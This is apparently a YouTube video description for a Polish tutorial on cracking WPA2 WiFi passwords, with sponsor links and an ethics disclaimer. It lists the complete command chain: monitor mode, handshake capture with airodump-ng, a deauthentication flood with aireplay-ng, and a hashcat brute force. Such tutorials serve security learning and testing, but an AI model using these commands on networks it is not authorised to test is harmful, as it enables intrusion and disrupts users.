59,180 views
???? Download the demo lesson and join the ZSK training: https://rozumiesieci.pl ???? IT services for your company: https://itonline.pl/uslugi-it/ In this material, I show you how to crack a password for a WiFi network secured with the WPA2 key protocol. I will use an ordinary laptop and publicly available tools. I show you the step-by-step process of cracking the password - from listening to the network, through intercepting the handshake, to cracking the key. NOTE: This video is for educational purposes only. Cracking passwords for networks that are not your property is illegal and unethical. ➡️ Recommended Alfa Network card (cheaper) Amazon: https://amzn.to/3zTkLbk ➡️ Recommended Alfa Network card (more expensive) Amazon: https://amzn.to/4de60OJ Check out the offer of channel partners: ➡️ Grandmetric: https://bit.ly/3ONaYqr ➡️ 4hFIX: https://bit.ly/4elzPy2 ➡️ e24cloud: https://bit.ly/46TLReK Tools and services I use: ????️ VPN - ProtonVPN (up to 64% discount): https://bit.ly/4fLvLb8 ????️ Hosting - SeoHost (25% discount with code: itonline): https://bit.ly/3STML5q ???? Internet provider: Korbank https://bit.ly/3e4NNav ???? Newsletter support - MailerLite (get $20) https://bit.ly/3PJyJ4H ???????? Online course platform - WebToLearn https://bit.ly/3THyWq3 ➡️ Accounting - inFakt (get 10% discount) https://bit.ly/3xkb84j ???? Project management - ClickUP: https://bit.ly/3hUkxE6 ???? Generating subtitles for movies: https://bit.ly/3vsVu69 ????♂️ Let's stay in touch: / marcelguzenda / mguzenda / marcelguzenda / marcelguzenda --- Commands used in the material: Checking the card and switching to monitor mode: iwconfig or iw dev Entering the card into monitor mode: sudo ip link set wlan0 down sudo iwconfig wlan0 mode monitor sudo ip link set wlan0 up WiFi network view: sudo airodump-ng wlan0 Start packet capture: sudo airodump-ng -w captures -c 5 --bssid XX:XX:XX:XX:XX:XX wlan0 Force re-authentication (new terminal window) sudo aireplay-ng –deauth 0 -a XX:XX:XX:XX:XX:XX wlan0 Disable monitor mode, switch to standard mode: sudo ip link set wlan0 down sudo iwconfig wlan0 mode managed sudo ip link set wlan0 up hcxpcapngtool tool: hcxpcapngtool -o pass.hc22000 captures-01.cap Cracking passwords with Hascat on Windows: cd downloads cd hashcat-6.2.6 hashcat.exe -m 22000 -a 3 pass.hc22000 ?d?d?d?d?d?d?d?d?d hashcat.exe -m 22000 -a 3 pass.hc22000 ?d?d?d?d?d?d?d?d?d --show --- ???? Topics covered in the episode: cracking wifi passwords, hacking wireless networks, wifi security, attacking wpa2, kali linux, aircrack-ng, hashcat, cybersecurity, ethical hacking, penetration testing, wireless network, wifi security, cracking wifi password, wireless security, network hacking, how to crack wifi passwords, © All trademarks are the property of their rightful owners. Some of the links above are affiliate links. By making a purchase using them, you do not incur additional costs, but you support the development of the channel. #computernetworks #wifi #security